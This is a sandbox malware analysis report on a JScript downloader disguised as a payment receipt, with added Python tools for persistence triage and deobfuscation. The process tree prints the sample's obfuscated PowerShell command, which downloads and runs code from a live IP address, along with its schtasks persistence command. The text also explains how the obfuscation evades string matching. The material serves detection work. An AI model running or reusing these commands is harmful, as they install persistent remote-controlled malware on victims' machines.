Analysis
max time kernel: 153s
max time network: 191s
platform: windows7_x64
resource: win7-en-20210920
submitted: 28-10-2021 15:41
Static task: static1
Behavioral task: behavioral1 (sample h6d2_Payment_receipt.js on resource win7-en-20210920)
General
Target: h6d2_Payment_receipt.js
Size: 81KB
MD5: ac46bea5b7fd09b1ab3da2b95cb03006
SHA1: e59702bca30c23aed49b4e24e6f1411c450ba8d2
SHA256: 2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
SHA512: 601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4
Malware Config
Extracted URL (second-stage download target used by the PowerShell stage): http://13.78.209.105/E/err.txt
Signatures
Blocklisted process makes network request (1 IoC)
  - flow 5, pid 1224, process wscript.exe

Drops startup file (2 IoCs)
  - File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js (wscript.exe)
  - File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js (wscript.exe)

Adds Run key to start application (2 TTPs, 2 IoCs)
  - Key created: \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run (wscript.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\h6d2_Payment_receipt.js'" (wscript.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description for the signature; nothing else in this report shows file encryption, and the observed chain is a script downloader.)

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution. (Here: task "Skype", every 30 minutes, re-running the dropped .js; see the process tree.)

Suspicious behavior: EnumeratesProcesses (1 IoC)
  - pid 1628, process powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  - Token: SeDebugPrivilege, pid 1628, process powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs, three identical entries per parent/child pair)
  - PID 1224 (wscript.exe) wrote to memory of PID 1608 (schtasks.exe)
  - PID 1224 (wscript.exe) wrote to memory of PID 1112 (WScript.exe)
  - PID 1112 (WScript.exe) wrote to memory of PID 1628 (powershell.exe)
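The three persistence artefacts above (the Startup-folder copy, the Run key, and a scheduled task that re-runs the script every 30 minutes) all point at the same .js in the user's Temp directory. As an added example that is not part of the sandbox report, the following Python triage script takes those artefacts as recorded, plus two constructed benign entries for contrast, and flags the traits a detection engineer keys on: a script file or script host as the persistence target, a user-writable location, and a short re-execution interval. The event layout, the directory and extension lists, the 60-minute threshold and all helper names are my own assumptions.

```python
from pathlib import PureWindowsPath

# Extensions and interpreters that make a persistence target worth a look (my lists, not sandbox rules).
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# Directories any standard user can write to (heuristic chosen for this example).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")
SHORT_INTERVAL_MIN = 60   # a task firing at least hourly is unusual for user software (assumed threshold)

# First three events: persistence artefacts as recorded in the report above (the sandbox's
# backslash escaping on the Run key value removed). Last two: constructed benign entries.
EVENTS = [
    {"kind": "schtasks", "cmdline": r""""C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js"""},
    {"kind": "runkey", "name": "BB4HJP0E1C", "value": r"'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js'"},
    {"kind": "startup", "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js"},
    {"kind": "runkey", "name": "OneDrive", "value": r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},   # constructed
    {"kind": "schtasks", "cmdline": r"schtasks.exe /create /sc daily /st 02:00 /tn NightlyBackup /tr C:\Tools\Backup\backup.exe"},  # constructed
]


def split_args(cmdline):
    """Whitespace split with surrounding quotes stripped. Enough for the paths in this report
    (no spaces) and tolerant of the unbalanced quote the sandbox recorded on the /tr value."""
    return [tok.strip("'\"") for tok in cmdline.split()]


def parse_schtasks(cmdline):
    """Map schtasks options to their values; flag-only options (e.g. /create) map to True."""
    args, opts = split_args(cmdline), {}
    for i, tok in enumerate(args):
        if not tok.startswith("/"):
            continue
        has_value = i + 1 < len(args) and not args[i + 1].startswith("/")
        opts[tok.lower()] = args[i + 1] if has_value else True
    return opts


def interval_minutes(opts):
    """Re-execution period in minutes for /sc minute or /sc hourly; None for other schedules."""
    sc, mo = str(opts.get("/sc", "")).lower(), str(opts.get("/mo", "1"))
    if not mo.isdigit():
        return None
    return {"minute": int(mo), "hourly": 60 * int(mo)}.get(sc)


def assess_target(path):
    """Reasons a persistence target deserves attention; empty list means nothing stood out."""
    p, low, reasons = PureWindowsPath(path), path.lower(), []
    if p.suffix.lower() in SCRIPT_EXT:
        reasons.append(f"script file as persistence target ({p.suffix})")
    if p.name.lower() in SCRIPT_HOSTS:
        reasons.append(f"script host as persistence target ({p.name})")
    if any(d in low for d in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    return reasons


def triage(events):
    """Return (label, target, reasons) for every event with at least one reason."""
    findings = []
    for ev in events:
        if ev["kind"] == "schtasks":
            opts = parse_schtasks(ev["cmdline"])
            if "/create" not in opts:
                continue
            target, reasons = str(opts.get("/tr", "")), assess_target(str(opts.get("/tr", "")))
            mins = interval_minutes(opts)
            if mins is not None and mins <= SHORT_INTERVAL_MIN:
                reasons.append(f"re-executes every {mins} minute(s)")
            label = f"scheduled task {opts.get('/tn')}"
        elif ev["kind"] == "runkey":
            target = split_args(ev["value"])[0]        # first token is the program, rest are arguments
            reasons, label = assess_target(target), f"Run key {ev['name']}"
        else:
            target = ev["path"]
            reasons, label = assess_target(target), "Startup folder drop"
        if reasons:
            findings.append((label, target, reasons))
    return findings


if __name__ == "__main__":
    for label, target, reasons in triage(EVENTS):
        print(f"{label}: {target}")
        for r in reasons:
            print(f"    - {r}")
```

Run as-is, the three artefacts from this report are reported with their reasons and the two constructed entries stay silent. The same three checks transfer directly to a detection rule: a `schtasks /create` whose `/tr` ends in a script extension, a Run value under `\AppData\Local\Temp\`, or a script dropped into the Startup folder is a high-signal combination on its own, and seeing all three from one `wscript.exe` parent, as here, is the pattern to alert on.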
Processes (PIDs taken from the WriteProcessMemory entries above; the numbers in brackets are the tree depth)

[1] C:\Windows\system32\wscript.exe (pid 1224)
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
    - Blocklisted process makes network request
    - Drops startup file
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\schtasks.exe (pid 1608)
        Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
        - Creates scheduled task(s)

    [2] C:\Windows\System32\WScript.exe (pid 1112)
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (pid 1628)
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
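The PowerShell stage never contains the strings "New-Object", "Net.WebClient" or "DownloadString": it rebuilds them from runs of filler characters and .Replace() calls, breaks the command name up with backticks, and hands the result to IEX twice (once to build the download call, once to run whatever err.txt returns). As an added example that is not part of the sandbox report, the Python below replays those string assignments statically, without executing any PowerShell, then resolves the backtick and variable tricks to show the command IEX actually receives. The command line is copied from the process tree above; the evaluator, its helper names and the list of identifiers it normalises are my own.

```python
import re

# The command line recorded for pid 1628 in the process tree above (the sample's own text).
OBFUSCATED = (
    r"""$H ='http://13.78.209.105/E/err.txt';"""
    r"""$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');"""
    r"""$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');"""
    r"""$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');"""
    r"""$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');"""
    r"""$HH =$H1+$H2+$H3+$H4;"""
    r"""$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');"""
    r"""$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');"""
    r"""&('I'+'EX')($HHHH -Join '')|&('I'+'EX');"""
)

# The only expression forms this sample uses: literals, $vars, +, .Replace() and -Join ''.
TOKEN = re.compile(r"""
      '((?:[^']|'')*)'                                              # single-quoted literal ('' escapes a quote)
    | \$([A-Za-z_]\w*)                                              # variable reference
    | \.replace\(\s*'((?:[^']|'')*)'\s*,\s*'((?:[^']|'')*)'\s*\)    # .Replace('old','new')
    | (\+)                                                          # string concatenation
    | -join\s*''                                                    # -Join '' on a single string is the identity
    """, re.VERBOSE | re.IGNORECASE)
ASSIGN = re.compile(r"^\s*\$([A-Za-z_]\w*)\s*=(.*)$", re.S)
CALL = re.compile(r"^\s*&\s*\((.*?)\)\s*(?:\((.*)\))?\s*$", re.S)   # &('I'+'EX')(args)
PS_ESCAPES = set("0abefnrtuv")   # letters that form a real PowerShell escape after a backtick
IDENT = re.compile(r"^[\w.\-]+$")
KNOWN_NAMES = ("Invoke-Expression", "IEX", "New-Object", "Net.WebClient", "DownloadString")


def unquote(s):
    return s.replace("''", "'")


def split_top(s, sep):
    """Split on sep outside single-quoted strings; drops empty pieces."""
    parts, buf, in_str = [], [], False
    for ch in s:
        if ch == "'":
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p for p in parts if p.strip()]


def eval_expr(expr, env):
    """Evaluate a string expression; .Replace is .NET's ordinal replace-all, as on the sample."""
    parts, cur = [], ""
    for m in TOKEN.finditer(expr):
        lit, var, old, new, plus = m.groups()
        if lit is not None:
            cur = unquote(lit)
        elif var is not None:
            cur = env[var.upper()]          # PowerShell variable names are case-insensitive
        elif old is not None:
            cur = cur.replace(unquote(old), unquote(new))
        elif plus:
            parts.append(cur)
            cur = ""
    parts.append(cur)
    return "".join(parts)


def expand_code(code, env):
    """Undo the two tricks inside the string handed to IEX: no-op backticks and $var references."""
    out, i = [], 0
    while i < len(code):
        # `W `- `E `T: a backtick before anything but a real escape letter is dropped by the
        # PowerShell tokenizer, which is how the sample keeps "New-Object" out of the string.
        if code[i] == "`" and i + 1 < len(code) and code[i + 1] not in PS_ESCAPES:
            i += 1
            continue
        out.append(code[i])
        i += 1
    code = "".join(out)
    for name in sorted(env, key=len, reverse=True):   # longest first so $H never clobbers $HH
        value = env[name]
        shown = value if IDENT.match(value) else "'" + value.replace("'", "''") + "'"
        code = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, s=shown: s, code, flags=re.I)
    return code


def deobfuscate(cmd):
    """Return the resolved variables and every code string that reaches IEX, in order."""
    env, handed_to_iex = {}, []
    for stmt in split_top(cmd, ";"):
        m = ASSIGN.match(stmt)
        if m:
            env[m.group(1).upper()] = eval_expr(m.group(2), env)
            continue
        for stage in split_top(stmt, "|"):
            c = CALL.match(stage)
            if not c or eval_expr(c.group(1), env).upper() not in ("IEX", "INVOKE-EXPRESSION"):
                continue
            if c.group(2) is None:      # bare "| IEX": it runs whatever the previous stage emitted
                handed_to_iex.append("<output of the previous pipeline stage>")
            else:
                handed_to_iex.append(expand_code(eval_expr(c.group(2), env), env))
    return env, handed_to_iex


def canonical(code):
    """Normalise the case of identifiers we recognise (PowerShell resolves them case-insensitively)."""
    for name in KNOWN_NAMES:
        code = re.sub(re.escape(name), name, code, flags=re.I)
    return code


if __name__ == "__main__":
    env, stages = deobfuscate(OBFUSCATED)
    for name in sorted(env):
        print(f"${name:<5} = {env[name]!r}")
    for stage in stages:
        print("IEX <-", canonical(stage))
```

The first IEX receives IEX(New-Object Net.WebClient).DownloadString('http://13.78.209.105/E/err.txt'), i.e. the inner IEX already executes the downloaded text, and the trailing | IEX runs the output of that again. Nothing in the report records what err.txt contained, so the stage after this one is unknown here; the URL and the wscript/WScript/powershell parent chain are the indicators to pivot on.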
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs
  MD5: 2b137d3d2ea7ddba63e99586f44e0388
  SHA1: d4634061943a78624880537ffa65472fc6195474
  SHA256: 1af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
  SHA512: 6a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115

Memory dumps:
  memory/1112-55-0x0000000000000000-mapping.dmp
  memory/1224-53-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp (8KB)
  memory/1608-54-0x0000000000000000-mapping.dmp
  memory/1628-58-0x0000000000000000-mapping.dmp
  memory/1628-60-0x000007FEF3000000-0x000007FEF3B5D000-memory.dmp (11.4MB)
  memory/1628-62-0x0000000002702000-0x0000000002704000-memory.dmp (8KB)
  memory/1628-63-0x0000000002704000-0x0000000002707000-memory.dmp (12KB)
  memory/1628-61-0x0000000002700000-0x0000000002702000-memory.dmp (8KB)
  memory/1628-64-0x000000000270B000-0x000000000272A000-memory.dmp (124KB)